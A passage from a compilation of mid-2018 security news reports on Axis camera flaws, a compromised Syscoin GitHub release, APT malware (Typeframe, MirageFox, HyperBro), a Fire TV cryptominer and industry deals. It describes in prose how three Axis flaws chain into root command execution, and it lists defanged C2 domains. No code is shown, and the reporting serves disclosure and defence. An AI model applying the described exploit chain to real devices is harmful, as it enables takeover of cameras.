Even if you see the Fortnite Android version in the official Google Play store, do not download it, unfortunately, scammers are able to deploy fake apps also on the official store.


Hacking more than 400 Axis camera models by chaining 3 flaws
19.6.2018 securityaffairs
Vulnerebility

Researchers from cybersecurity firm VDOO have discovered several vulnerabilities affecting nearly 400 security cameras from Axis Communications.
Researchers from cybersecurity firm VDOO have conducted a study on IoT devices and discovered seven vulnerabilities in cameras manufactured by Axis Communications. According to the vendor, nearly 400 models are affected by the issue and Axis has released security patches for each flaw.

An attacker can remotely take over a camera by knowing its IP address, exploiting the flaws it is possible to access and freeze the video stream, control every function of the camera (e.g. motion detection, direction) and also to alter the software.

Experts warn that an attacker can compromise cameras to recruit them in a botnet that could be used to power a broad range of attacks, such a DDoS and cryptocurrency mining.

“One of the vendors for which we found vulnerable devices was Axis Communications. Our team discovered a critical chain of vulnerabilities in Axis security cameras. The vulnerabilities allow an adversary that obtained the camera’s IP address to remotely take over the cameras (via LAN or internet). In total, VDOO has responsibly disclosed seven vulnerabilities to Axis security team.” reads the analysis published by VDOO.

“Chaining three of the reported vulnerabilities together, allows an unauthenticated remote attacker that has access to the camera login page through the network (without any previous access to the camera or credentials to the camera) to fully control the affected camera.”

The experts published Technical details for each issue and related proof-of-concept (PoC) code.

The researchers demonstrated that chaining three vulnerabilities it is possible to hack Axis cameras by sending specially crafted requests as root (CVE-2018-10662) and bypassing authentication (CVE-2018-10661), then injecting arbitrary shell commands (CVE-2018-10660).

Below the attack sequence demonstrated by the researchers:

Step 1: The attacker uses an authorization bypass vulnerability (CVE-2018-10661) to send unauthenticated HTTP requests that reach the .srv functionality (that handles .srv requests) inside /bin/ssid. Normally, this functionality should only be accessible to administrative users.
Step 2: The attacker then utilizes an interface that allows sending any dbus message to the device’s bus, without restriction (CVE-2018-10662), that is reachable from /bin/ssid’s .srv. Due to the fact that /bin/ssid runs as root, these dbus messages are authorized to invoke most of the system’s dbus-services’ interfaces (that were otherwise subject to a strict authorization policy). The attacker chooses to send dbus messages to one such dbus-service’s interface – PolicyKitParhand, which offers functions for setting parhand parameters. The attacker now has control over any of the device’s parhand parameter values. (See the next vulnerability).
Step 3: A shell command injection vulnerability (CVE-2018-10660) is then exploited. Some parhand parameters (of type “Shell-Mounted”) end up in configuration files in shell variable assignment format, which are later, included in a service’s init-script that runs as root. Due to step-2, the attacker is able to send unauthenticated requests to set parhand parmeter values. By doing so, the attacker can now exploit this vulnerability by setting one parameter’s value with special characters which will cause command injection, in order to execute commands as the root user.
The remaining vulnerabilities discovered by VDOO can be exploited by unauthenticated attackers to obtain information from the memory o to trigger a DoS condition.

axis cameran flaws

Axis published a security advisory that includes the complete list of all impacted cameras and the firmware version that address the vulnerabilities.

As part of the same study on the security of IoT devices, researchers at VDOO discovered several vulnerabilities in Foscam cameras.


Compromised GitHub Account Spreads Malicious Syscoin Installers
18.6.2018 securityweek 
Virus 

Malware-laden Syscoin releases were up for download on an official GitHub repository after hackers managed to compromise an account and replace legitimate Windows installers.

The malicious releases were posted on the Syscoin GitHub release page on June 9 and remained there until June 13. Only the Windows Syscoin 3.0.4.1 installers (syscoincore-3.0.4-win32-setup.exe and syscoincore-3.0.4-win64-setup.exe) were affected.

In a security notice published on Syscoin’s official account on the soon-to-be Microsoft owned GitHub, the developers explain that the malicious code included in the modified installers is detected as Trojan:Win32/Feury.B!cl.

Mac and Linux releases were not modified by the hackers. Windows users who downloaded the ZIP files weren’t affected either (all users who did not download or execute the Syscoin 3.0.4.1 setup binaries are safe).

“This may affect Windows users who downloaded and executed the Syscoin 3.0.4.1 Windows setup binaries from Github between June 09th, 2018 10:14 PM UTC & June 13th, 2018 10:23 PM UTC,” the security notice reads.

“Please be aware this exploit method could potentially affect other blockchain projects on Github,” Blockchain Foundry notes in the Syscoin 3.0.5’s release announcement.

Windows users are advised to check the installation date for their Syscoin and make sure they did not download and execute releases containing the malicious code.

If the modified/installation date is between June 9, 2018, and June 13, 2018, users are advised to back up important data (including wallets) and make sure it does not contain infectious code, then scan their system with an anti-virus application.

They should also change passwords entered in the timeframe (the malware is a keylogger), secure any funds stored in “unencrypted wallets or wallets that had been unlocked during the infection period.”

Windows users who downloaded the corrupted binaries are also advised to run a GenericKD Trojan removal guide before restarting the system, as the Trojan might log entered passwords.

The hack was discovered after the Blockchain Foundry team received reports that the syscoincore-3.0.4-win64-setup.exe binary was being flagged as a potential virus by Windows Defender SmartScreen, AVG, and Kaspersky.

“Investigation into the issue revealed the original Github Windows setup binaries for release 3.0.4.1 had been modified and replaced with a malicious version through a compromised Github account. Upon discovery, the 3.0.4.1 setup binaries were removed from Github and replaced with official, signed versions of the binaries,” Syscoin reveals.

The malicious binaries were immediately removed from the repository and replaced with the legitimate ones. To prevent similar incidents, Syscoin developers and Blockchain Foundry staff with Github access are now required to have 2-step authentication enabled, to routinely check signature hashes, and to “work with Github to ensure users will be able to detect if binaries have been altered after release.”

“Although the issue was detected quickly, we believe that the crypto-community is at risk for a specific type of attack which targets gatekeepers of source code for cryptocurrency projects. We highly recommend that all gatekeepers of software repositories for cryptocurrency projects sign binaries through an official build process like Gitian,” Syscoin notes.


F-Secure Acquires MWR InfoSecurity for $106 Million
18.6.2018 securityweek IT

Finland-based F-Secure announced on Monday that it has entered an agreement to acquire cybersecurity consultancy MWR InfoSecurity for over €91.6 million ($106 million) in cash and the promise of a significant earn-out if business objectives are achieved until the end of 2019.

Specifically, in addition to the €91.6 million ($106 million), which is subject to adjustments, F-Secure has agreed to pay up to €28.6 million ($33 million) if the agreed business target is achieved between July 1, 2018, and December 31, 2019.

The acquisition is expected to be completed in early July. F-Secure is still evaluating the impact of the acquisition on the company’s financial outlook for 2018.

MWR has nearly 400 employees across offices in the UK, the US, South Africa and Singapore. The company estimates that its revenue for the financial year ending on June 30 will be €31.1 million ($36 million).

The deal is part of F-Secure’s growth strategy, allowing the company to expand its services offering to global markets. The acquisition of MWR also results in the addition of the Countercept threat hunting platform to F-Secure’s detection and response offering. The company’s portfolio will also be enhanced by MWR’s managed phishing protection services.

“The acquisition brings MWR InfoSecurity’s industry-renowned technologies to F-Secure making our detection and response offering unrivaled. Their threat hunting platform (Countercept) is one of the most advanced in the market and is an excellent complement to our existing technologies,” said F-Secure CEO Samu Konttinen.

“I’m thrilled to welcome MWR InfoSecurity’s employees to F-Secure. With their vast experience and hundreds of experts performing cyber security services on four continents, we will have unparalleled visibility into real-life cyber attacks 24/7. This enables us to detect indicators across an incredible breadth of attacks so we can protect our customers effectively. As most companies currently lack these capabilities, this represents a significant opportunity to accelerate F-Secure’s growth,” Konttinen added.


UK Email Threat Firm Tessian Secures $13 Million Series A Funding
18.6.2018 securityweek IT

London, UK-based start-up Tessian has raised $13 million in a Series A funding round led by Balderton Capital. Existing investors Accel, Amadeus Capital Partners, Crane, LocalGlobe, Winton Ventures and Walking Ventures also participated. It brings Tessian's total funding, including initial Angel investments and seed funding, to $16.8 million.

Tessian uses machine learning artificial intelligence to prevent sensitive data leakage via email. It was founded in 2013 by Tom Adams, Ed Bishop and Tim Sadler, who first met as students at Imperial College, London before moving on to careers in investment banking. It was here they realized the extent and danger of accidental data leakage via email -- and saw a market gap for a preventative product.

Data from the UK's data protection regulator, the Information Commissioner's Office (ICO) shows the single greatest category of reported data security incidents in the UK during the first quarter of 2018 was data sent by email to the wrong person. With the likelihood of such incidents attracting more attention and potentially greater fines under GDPR (effective from May 2018), it is a simple business error that needs to be addressed.

"It's human nature to fear scary things like hackers or malware," explains Sadler, "but we often don't think twice about the dangers behind something as familiar and ingrained as sending an email. In reality that's where an overwhelming threat lies."

"What Tessian has done," comments Balderton Capital partner Suranga Chandratillake, "is apply machine intelligence to understand how humans communicate with each other and use that deeper understanding to secure enterprise email networks." As an investor he sees great potential for expanding the approach into other forms of human business communication. "The genius of this approach," he continues, "is that while the product focus today is on email -- by far the most used communication channel in the corporate enterprise -- their technology can be applied to all communication channels in time. And, as we all communicate in larger volumes and on more channels, that represents a vast opportunity."

Both Chandratillake and Accel partner Luciana Lixandru will join the Tessian board. "Since our seed investment just over a year ago," she said, "the company's ability to address a fundamental data security risk has been reflected in its strong growth and a string of blue chip client wins."

That growth has seen annual recurring revenue increase by 400% in the last twelve months, with staff levels increasing from 13 to 50 people. Clients include Schroders, Man Group and Dentons and over 70 UK law firms.

Chris White, global CIO at international law firm Clyde & Co LLP, commented, "Misaddressed emails are a major cybersecurity problem that all organizations have to deal with, but trying to train human error out of employees is near impossible. Tessian's machine intelligence plays a vital role in helping mitigate these kinds of errors and ensure that customer data remains secure and private. The speed and ease of deployment of Tessian," he added, "has been unparalleled by any other solution we've dealt with, and has been our quickest GDPR win to date."

Tessian uses machine learning to understand normal email communication patterns and automatically identify email security threats in real time. It analyzes enterprise email networks to understand normal and abnormal email sending patterns and behaviors, detects anomalies in outbound emails and warns users about potential mistakes, before the email is sent.

"Our belief at Tessian," co-founder and CTO Ed Bishop told SecurityWeek, "is that organizations' security has moved on from perimeter firewalls, and even endpoint security. I think we are in a third phase here, where humans are the real endpoints of the organization." If you look at how hackers try to break into a company, they're not so much hacking devices as hacking the humans.

"We are focused on building security for the human endpoint," he continued. "In short, we are thinking not just about outbound email threats, but also inbound email threats; and in going beyond that to understand what are the other ways in which humans leak data within an enterprise."

The new funding will be used to expand its product offering and increase its sales and marketing teams. It is likely that the product will be expanded to directly address the BEC and phishing threats before the firm moves on to other forms of business communication.


DHS, FBI Share Details of North Korea's 'Typeframe' Malware
18.6.2018 securityweek  BigBrothers

The U.S. Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have published another report on the US-CERT website detailing a piece of malware allegedly used by the North Korean government.

A dozen reports have been published by the DHS and the FBI over the past year on the North Korea-linked threat group tracked by the U.S. government as Hidden Cobra. The list of tools detailed by the agencies includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest report describes a piece of malware dubbed “Typeframe” and it covers a total of 11 samples related to the threat, including executable files and malicious Word documents containing VBA macros.Typeframe malware used by North Korea detailed by FBI and DHS

“These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim's firewall to allow incoming connections,” the agencies said.

The alert contains indicators of compromise (IoCs) for each of the files, including a description of their functionality, hashes, IPs, antivirus detections, metadata, and YARA rules.

The goal of the report is to “enable network defense and reduce exposure to North Korean government malicious cyber activity.” However, security experts argued in the past that these types of alerts from government agencies are actually not enough to help improve defenses.

The previous Hidden Cobra report, published on the US-CERT website in late May, attributed the Joanap backdoor trojan and the Brambul worm to the North Korean government.

While it has always denied accusations, experts say North Korea continues to be highly active in cyberspace, with some claiming that the country is even more aggressive than China. Recent attacks attributed to North Korea involved new malware and even zero-day vulnerabilities.


Critical Flaws Expose 400 Axis Cameras to Remote Attacks
18.6.2018 securityweek  
Vulnerebility

Roughly 400 security cameras from Axis Communications are affected by several vulnerabilities, including critical flaws that can be chained to take complete control of a device and access its video stream.

As part of its research into IoT devices, cybersecurity firm VDOO has uncovered a total of seven vulnerabilities in cameras made by Axis. The vendor has identified nearly 400 affected models and released patches for each of them.

According to VDOO, an attacker who knows the targeted camera’s IP address can remotely and without authentication take full control of the device. This includes accessing its video stream, freezing the video stream, controlling the direction and functions of the camera (e.g. motion detection), adding the device to a botnet, altering its software, leveraging it for lateral movement within the network, abusing it for DDoS attacks and cryptocurrency mining, and rending the camera useless.Critical vulnerabilities found in Axis cameras

There are three vulnerabilities that can be chained to remotely hack a device. These allow an attacker to bypass authentication (CVE-2018-10661), send specially crafted requests as root (CVE-2018-10662), and inject arbitrary shell commands (CVE-2018-10660).

The other flaws discovered by VDOO can be exploited by unauthenticated attackers to crash various processes or to obtain information from the memory.

Critical vulnerabilities found in Axis cameras

Technical details and proof-of-concept (PoC) code have been made public for each of the vulnerabilities.

Axis has published an advisory containing the names of all impacted cameras and which firmware version contains patches.

This was not the first time researchers discovered vulnerabilities in cameras from Axis. Roughly one year ago, Senrio found a security hole, dubbed Devil’s Ivy, that allowed an attacker to cause a DoS condition or execute arbitrary code on Axis cameras. Since that flaw affected a third-party component, other IoT devices were affected as well.

As part of its research into IoT products, VDOO also discovered serious vulnerabilities in Foscam cameras. Foscam also released patches, unlike last year when researchers were forced to disclose multiple flaws after the vendor failed to take action.


Cyber Attack Aims to Manipulate Mexican Election
18.6.2018 securityweek   BigBrothers

On Wednesday June 13, in the run-up to Mexico's July 1 presidential election, a website operated by the rightist National Action Party (PAN) was taken off-line for several hours by a DDoS attack. The outage occurred at the time of a televised presidential debate, and just following a point at which the PAN candidate held up a placard with the website address claiming it held proof of potential corruption.

PAN secretary Damian Zepeda later suggested that front-running leftist candidate Andres Manuel Lopez Obrador (AMLO) was behind the attack. "The AMLO bots have been activated to try to crash the page debate2018.mx where there are proofs of contracts worth millions given to AMLO's friend," Zepeda wrote on Twitter.

PAN later claimed that the site had been hit by 185,000 visits in 15 minutes, "with the attacks coming mainly from Russia and China." Lopez Obrador denied any involvement in the attack, and laughed off any suggestion of ties with Russia by calling himself 'Andres Manuelovich'.

The source of the DDoS attack is unknown and possibly unknowable -- but it is a reminder of the extent to which the internet can be used to influence or even control public opinion.

The accusations of Russian involvement in both the Trump election in the U.S. and the UK Brexit referendum are still fresh. Perhaps more directly relevant is the controversy over the DDoS attack on the FCC website just as it was gathering public comment on the (then) proposed elimination of the net neutrality rules.

The FCC claimed it had been taken off-line by a DDoS attack. Critics of the FCC plans have suggested it was purposely taken off-line to avoid registering mass public dissent over the FCC rules. If the Mexico event was a direct parallel to these claims, it could suggest that PAN couldn't prove the criticisms it was making, and took down the website itself.

This last possibility is not a serious proposal -- but it illustrates the plausible deniability and difficulty of attribution that comes with cyber activity. The DDoS attack could have been delivered by Russia (because it has a history of interference); by AMLO (to prevent access to his competitor's website); by the U.S. (because it would almost certainly prefer a right-leaning to a left-leaning neighbor); or by PAN itself (as a false flag). Or, of course, none of the above -- a straightforward DDoS attack by cybercriminals.

At this stage, the only thing is certain is that a DDoS attack did take place in Mexico. Netscout Arbor's analysis of the period shows more than 300 attacks per day in Mexico during the period 12th-13th June -- which is 50% higher than the normal frequency in the country. The largest volumetric DDoS attack targeting Mexico during the week was more than 200 Gbps.

"Political websites are frequent targets of DDoS attacks not only due to the ease of launching attacks, but also due to the desire and capabilities of attackers to impact the election process while staying undiscovered," comments Kirill Kasavchenko, principal security technologist at Netscout Arbor. "Due to the nature of modern DDoS attacks, it is quite easy to launch attacks from third countries utilizing computers and IoT devices infected by malware or using techniques like reflection of DDoS traffic. Tracing down the original source of the attack and the people behind it is problematic not only from a technical, but also from an administrative point of view."


DHS, FBI published a join alert including technical details of Hidden Cobra-linked ‘Typeframe’ Malware
18.6.2018 securityaffairs BigBrothers

The US DHS and the FBI have published a new joint report that includes technical details of a piece of malware allegedly used by the Hidden Cobra APT.
A new joint report published by US DHS and FBI made the headlines, past document details TTPs associated with North Korea-linked threat groups, tracked by the US government as Hidden Cobra.

The US authorities have published the report to reduce the exposure to the activities of North Korea-linked APT groups.

Hidden Cobra’s arsenal includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest joint report includes a piece of malware dubbed “Typeframe” and it covers a total of 11 samples analyzed by the government experts.

The researchers analyzed several executables and weaponize Word documents containing VBA macros.

“DHS and FBI identified Trojan malware variants used by the North Korean government. This malware variant is known as TYPEFRAME. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.” reads the joint report.

“This malware report contains analysis of 11 malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications (VBA) macros. These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim’s firewall to allow incoming connections.”

Hidden Cobra

The security alert includes indicators of compromise (IoCs) for each of the sample analyzed by the experts.

The report includes a description of the functionality for each sample, hashes, IPs, antivirus detections, metadata, and YARA rules.

In May, US authorities published another report on the Hidden Cobra detailing the Joanap backdoor trojan and the Brambul worm.

The unique certainly is that North Korea continues to be one of the most aggressive and persistent threat actors in the cyberspace.


China-Linked APT15 is still very active, experts found its new malware tracked as ‘MirageFox’
18.6.2018 securityaffairs APT

Following the recent hack of a US Navy contractor security experts found evidence of very recent activity by the China-linked APT group tracked as APT15.
The China-linked APT15 group (aka Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon) has developed a new strain of malware borrowing the code from one of the tool he used in past operations.

APT15 has been active since at least 2010, it conducted cyber espionage campaigns against targets in defense, high tech, energy, government, aerospace, manufacturing industries worldwide. The attackers demonstrated an increasing level of sophistication across the years, they used a custom-malware and various exploits in their attacks.

Across the years, security firms identified many hacking tools associated with APT15 such as Mirage, BS2005, RoyalCLI, RoyalDNS, TidePool, BMW and MyWeb.

The group has been known to target organizations in the defense, high tech, energy, government, aerospace, manufacturing and other sectors.

In March 2018, APT15 used new backdoors is an attack that was likely part of a wider operation aimed at contractors at various UK government departments and military organizations.

One of the attacks aimed at a UK-based customer of NCC Group, an organization that provides a wide range of services to the United Kingdom government. The hackers focused on government departments and military technology by targeting the customer of the company.

NCC noted at the time that the APT15 used two new backdoors, tracked as RoyalCLI and RoyalDNS.

APT15

One of the backdoors has been tracked as RoyalCLI due to a debugging path left in the binary, it is the successor of BS2005 backdoor used by the group. Both RoyalCLI and BS2005 communicate with command and control (C&C) servers via Internet Explorer using the COM interface IWebBrowser2.

The attackers utilized Windows commands to conduct reconnaissance activities, the lateral movement was conducted by using a combination of net command, mounting the C$ share of hosts and manually copying files to or from compromised hosts.

The second backdoor, tracked as RoyalDNS, uses DNS to communicate with the C&C server, once executed the command the backdoor returns output through DNS.

Researchers from security firm Intezer, has recently identified a new piece of malware linked to APT15. The discovery was casual, the experts in fact discovered the malware while searching the Mirage malware based on YARA rules created for Mirage, one of the oldest tools used by the APT15 and for the Reaver malware that was linked to cyber espionage campaigns conducted by China-linked APT groups.

“Coincidentally, following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare, we have found evidence of very recent activity by a group referred to as APT15, known for committing cyber espionage which is believed to be affiliated with the Chinese government.” reads the analysis published by Intezer.

“The malware involved in this recent campaign, MirageFox, looks to be an upgraded version of a tool, a RAT believed to originate in 2012, known as Mirage.”

The new malware was tracked by the researchers as MirageFox, the name comes from a string found in one of the components that borrows code from both Mirage and Reaver.

The original Mirage malware includes the code for a remote shell and the function for decrypting command and control (C&C) configuration data.

Mirage also shares code with other malware attributed to APT15, including BMW, BS2005, and particularly MyWeb. Code similarities suggest the Reaver malware was developed by the APT15.

APT15 malware comparison

“MirageFox functions similarly to previous malware created by APT15, first collecting information about the computer like the username, CPU information, architecture, and so forth.” continues the analysis published by Intezer.

“Then it sends this information to the C&C, opens a backdoor, and sits waiting for commands from the C&C with functionality such as modifying files, launching processes, terminating itself, and more functionality typically seen in APT15’s RATs,”

The sample analyzed by the experts was compiled on June 8 and it was uploaded to VirusTotal on June 9.

The malware leverages a legitimate McAfee binary to load malicious processes through DLL hijacking, a technique already used by in past attacks.

Intezer experts also noticed that the C&C server is configured as an internal IP address, a circumstance that confirms the sample was configured to target organization.

“If you look at it the decrypted configuration, you may notice that the IP being used for the C&C is an internal IP address. If you read the report mentioned above about RoyalAPT by NCC Group, it is mentioned that APT15 infiltrated an organization again after stealing a VPN private key, therefore we can assume this version was tailor made to an organization they have already infiltrated and are connecting to the internal network using a VPN.” continues the report.

At the time the attack vector it is still unclear, further technical details including IoCs are reported in the analysis published by the company.

“There is high confidence that MirageFox can be attributed to APT15 due to code and other similarities in the MirageFox binaries.” concludes Intezer.

“As is known about APT15, after infiltrating their target, they conduct a lot of reconnaissance work, send the commands from the C&C manually, and will customize their malware components to best suit the environment they have infected.”


China-Linked APT15 Develops New 'MirageFox' Malware
18.6.2018 securityweek APT 

A cyber-espionage group believed to be operating out of China has developed a new piece of malware that appears to be based on one of the first tools used by the threat actor.

The actor is known as APT15, Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon, and its tools are tracked by various cybersecurity companies as Mirage, BS2005, RoyalCLI, RoyalDNS, TidePool, BMW and MyWeb. The group has been known to target organizations in the defense, high tech, energy, government, aerospace, manufacturing and other sectors.

One of APT15’s more recent attacks was uncovered last year when the hackers targeted a UK-based customer of NCC Group. The organization provides a wide range of services to the United Kingdom government and NCC believes the attackers may have targeted government departments and military technology through its customer.

NCC noted at the time that the group had improved its tools and techniques. The company had uncovered two new backdoors used by APT15, including RoyalCLI, a successor of BS2005, and RoyalDNS.

Intezer, a cybersecurity firm that specializes in recognizing code reuse, reported last week that it had identified a new piece of malware linked to APT15 based on YARA rules created for Mirage, the oldest tool used by the threat actor, and Reaver, another piece of malware previously linked by researchers to China.

The new malware, dubbed by Intezer MirageFox based on a string found in one of the components, shares code with both Mirage and Reaver. Experts have found significant similarities to the original Mirage malware, including in the code used for a remote shell and the function for decrypting command and control (C&C) configuration data.

Code similarities between Mirage and MirageFox

“MirageFox functions similarly to previous malware created by APT15, first collecting information about the computer like the username, CPU information, architecture, and so forth. Then it sends this information to the C&C, opens a backdoor, and sits waiting for commands from the C&C with functionality such as modifying files, launching processes, terminating itself, and more functionality typically seen in APT15’s RATs,” Jay Rosenberg, senior security researcher at Intezer, explained in a blog post.

The sample analyzed by the security firm was compiled on June 8 and uploaded to VirusTotal one day later. While it’s unclear how the malware has been distributed to victims, Intezer has made some interesting observations about MirageFox.

The malware appears to abuse a legitimate McAfee binary to load malicious processes through DLL hijacking. APT15 has been known to use DLL hijacking in its campaigns.

Intezer also noticed that a C&C server has an internal IP address, which suggests that the sample was specifically configured for the targeted organization and that, similar to the attack described earlier this year by NCC Group, the attackers gained access to the victim’s internal network using a VPN.

It’s unclear if they are connected, but Intezer pointed out that the discovery of MirageFox coincides with reports of an attack in which hackers believed to be sponsored by China stole sensitive information from a US Navy contractor.

While previous public reports on APT15 claim the group has been around since at least 2010, Rosenberg told SecurityWeek over the weekend that he has identified a Mirage sample uploaded to VirusTotal in 2009.

Rosenberg also noted that Mirage shares code with other pieces of malware attributed to APT15, including BMW, BS2005, and particularly MyWeb. The expert also believes, based on the code they share, that the developers of APT15 malware may have also created Reaver.


Android-based devices Amazon Fire TV and Fire Stick hit by cryptomining malware
18.6.2018 securityaffairs Android

A new crypto mining malicious code dubbed ADB.miner is targeting Android-based devices Amazon Fire TV and Fire Stick.
Recently, security experts spotted the crypto mining malware ADB.miner (Android.CoinMine.15) targeting Amazon Fire TV and Fire TV Stick devices.

The malicious code is active at least since February when researchers at Qihoo 360’s Netlab have spotted the Android mining botnet that targets Android devices by scanning for open ADB debugging interface (port 5555) and infects them with a Monero cryptocurrency miner.

The port 5555 is the working port ADB debug interface on Android device that should be shut down normally. The devices infected by ADB.miner are devices where users or vendors have voluntary enabled the debugging port 5555.

The Amazon devices hit by the ADB.miner leverages the ADB (Android Debug Bridge) for uninterrupted internet connections it is no surprise that they are now under attack.

Many Amazon Fire TV owners reported through a thread on the XDA forums that they streaming media players have been infected by the malware.

“hi guys ! i have a question i hope someone can help me with. I have a Gen 2 Firestick and for 2 days now this app called “test” keeps popping up at all times, i have no clue why its doing this. I have uninstalled the app and it comes back and ive even tryed to run the app and its tells me the App needs updated to run on my device, look for an updated version on my store.. and yeah the app dont exist on the store.. What is up with this thing?” wrote one of the Amazon Fire TV owners.

Once the malware has infected the device, it will abuse its resources to mine cryptocurrency and disrupts video playback feature.

The infected devices display the official Android logo and a message that states “Test.”

“Infected devices will become very slow to use. Loading apps will take longer than usual. This is because the malware is using 100% of the device’s processor to mine cryptocurrency. A screen that says “Test” with a green Android robot icon will also occasionally appear randomly on infected devices. This screen causes video playback and apps to abruptly stop, making the device difficult to use normally.” states an analysis published on Aftvnews.com.

Amazon Fire TV malware

Reverse engineering the code of the Test app the experts discovered it is a variation of ADB.Miner that opens a single HTML page, containing the CoinHive script, in the Android Webview to mine Monero. Below the code that included in the app.


Amazon Fire TV devices that have developer options disable cannot be infected by the ADB.miner.

It the Amazon device has already been infected it is possible to install the Total Commander app that will remove the ADB.miner.

To discover if your device is infected

Install Total Commander from the Amazon Appstore onto your Fire TV device.
Launch Total Commander and select the “Installed Apps” menu item.
If you see an app called “Test” installed on your device, then your device is infected.
Another way to remove the malicious code is to force a factory reset for the device, but If you do not want to factory reset your device install a modified version of the malicious app.

“If you do not want to factory reset your device and/or the malware keeps reappearing because your Fire TV keeps getting reinfected, you can try installing a modified version of the malware that doesn’t actually mine cryptocurrency. An XDA user by the name of innovaciones created this modified version of the malware. When installed, it updates the existing malware to a version that essentially turns off the miner.” concludes aftvnews.com.

“You can get the modified APK from this XDA post or from the short URL http://bit.ly/testappfix.”


Apple USB Restricted Mode feature will make hard for law enforcement to crack devices
18.6.2018 securityaffairs Apple

Apple introduced a new feature in the latest beta versions of iOS, dubbed USB Restricted Mode, to improve the security of a locked device,
Apple is implementing a new feature dubbed USB Restricted Mode to improve the security of its device, it is going to lock down the iPhone’s data port to avoid unauthorized access, but experts observed that in this way password-cracking tools used by forensics experts will be no more effective.

The USB Restricted Mode was implemented in the latest beta versions of the iOS operating system, it disables the data connection of the iPhone’s Lightning port after a specific interval of time but it doesn’t interrupt the charging process.

Any other data transfer would require the user providing the passcode.

Initially, the USB Restricted Mode required a passcode after 7 days.

“The USB Restricted Mode was implemented in the latest beta versions of the iOS operating system, it disables the data connection of the iPhone’s Lightning port after a specific interval of time but it doesn’t interrupt the charging process.” reads a blog post published by ElcomSoft.

Last week Apple provided an update on the new feature confirming that it will require a passcode every hour for the data transfers to continue.

“Apple said it was planning an iPhone software update that would effectively disable the phone’s charging and data port — the opening where users plug in headphones, power cables and adapters — an hour after the phone is locked.” reported the New York Times.

“While a phone can still be charged, a person would first need to enter the phone’s password to transfer data to or from the device using the port.”

Apple USB Restricted Mode feature

The new feature will have a significant impact on forensics investigation conducted using cracking tools such as Cellebrite and Grayshift’s Graykey.

Bruteforcing attacks against the six-digit passcode that protect Apple devices may be a time-consuming operation, it can take up to 22 hours to crack the device.

The USB restricted mode that is enabled by default in the iOS 11.4.1 and iOS 12 betas will interfere with forensics tools.

Anyway, the new feature can be manually disabled.

Experts highlighted that the new feature will also impact the vendors of iPhone peripherals.


LuckyMouse hits national data center to organize country-level waterholing campaign
17.6.2018 Kaspersky  APT 
Virus
In March 2018 we detected an ongoing campaign targeting a national data center in the Central Asia that we believe has been active since autumn 2017. The choice of target made this campaign especially significant – it meant the attackers gained access to a wide range of government resources at one fell swoop. We believe this access was abused, for example, by inserting malicious scripts in the country’s official websites in order to conduct watering hole attacks.

The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool (RAT). The timestamps for these modules are from December 2017 until January 2018. The anti-detection launcher and decompressor make extensive use of Metasploit’s shikata_ga_nai encoder as well as LZNT1 compression.

Kaspersky Lab products detect the different artifacts used in this campaign with the following verdicts: Trojan.Win32.Generic, Trojan-Downloader.Win32.Upatre and Backdoor.Win32.HyperBro. A full technical report, IoCs and YARA rules are available from our intelligence reporting service (contact us intelligence@kaspersky.com).

Who’s behind it?
Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor (also known as EmissaryPanda and APT27). Also the C2 domain update.iaacstudio[.]com was previously used in their campaigns. The tools found in this campaign, such as the HyperBro Trojan, are regularly used by a variety of Chinese-speaking actors. Regarding Metasploit’s shikata_ga_nai encoder – although it’s available for everyone and couldn’t be the basis for attribution, we know this encoder has been used by LuckyMouse previously.

Government entities, including the Central Asian ones also were a target for this actor before. Due to LuckyMouse’s ongoing waterholing of government websites and the corresponding dates, we suspect that one of the aims of this campaign is to access web pages via the data center and inject JavaScripts into them.

How did the malware spread?
The initial infection vector used in the attack against the data center is unclear. Even when we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can´t prove they were related to this particular attack. It’s possible the actor used a waterhole to infect data center employees.

The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to IP-address, that belongs to the Ukrainian ISP network, held by a Mikrotik router using firmware version 6.34.4 (from March 2016) with SMBv1 on board. We suspect this router was hacked as part of the campaign in order to process the malware’s HTTP requests. The Sonypsps[.]com domain was last updated using GoDaddy on 2017-05-05 until 2019-03-13.

FMikrotik router with two-year-old firmware and SMBv1 on board used in this campaign

In March 2017, Wikileaks published details about an exploit affecting Mikrotik called ChimayRed. According to the documentation, however, it doesn’t work for firmware versions higher than 6.30. This router uses version 6.34.

There were traces of HyperBro in the infected data center from mid-November 2017. Shortly after that different users in the country started being redirected to the malicious domain update.iaacstudio[.]com as a result of the waterholing of government websites. These events suggest that the data center infected with HyperBro and the waterholing campaign are connected.

What did the malware do in the data center?

Anti-detection stages. Different colors show the three dropped modules: legit app (blue), launcher (green), and decompressor with the Trojan embedded (red)

The initial module drops three files that are typical for Chinese-speaking actors: a legit Symantec pcAnywhere (IntgStat.exe) for DLL side loading, a .dll launcher (pcalocalresloader.dll) and the last-stage decompressor (thumb.db). As a result of all these steps, the last-stage Trojan is injected into svchost.exe’s process memory.

The launcher module, obfuscated with the notorious Metasploit’s shikata_ga_nai encoder, is the same for all the droppers. The resulting deobfuscated code performs typical side loading: it patches pcAnywhere’s image in memory at its entry point. The patched code jumps back to the decryptor’s second shikata_ga_nai iteration, but this time as part of the whitelisted application.

This Metasploit’s encoder obfuscates the last part of the launcher’s code, which in turn resolves the necessary API and maps thumb.db into the same process’s (pcAnywhere) memory. The first instructions in the mapped thumb.db are for a new shikata_ga_nai iteration. The decrypted code resolves the necessary API functions, decompresses the embedded PE file with RtlCompressBuffer() using LZNT1 and maps it into memory.

What does the resulting watering hole look like?
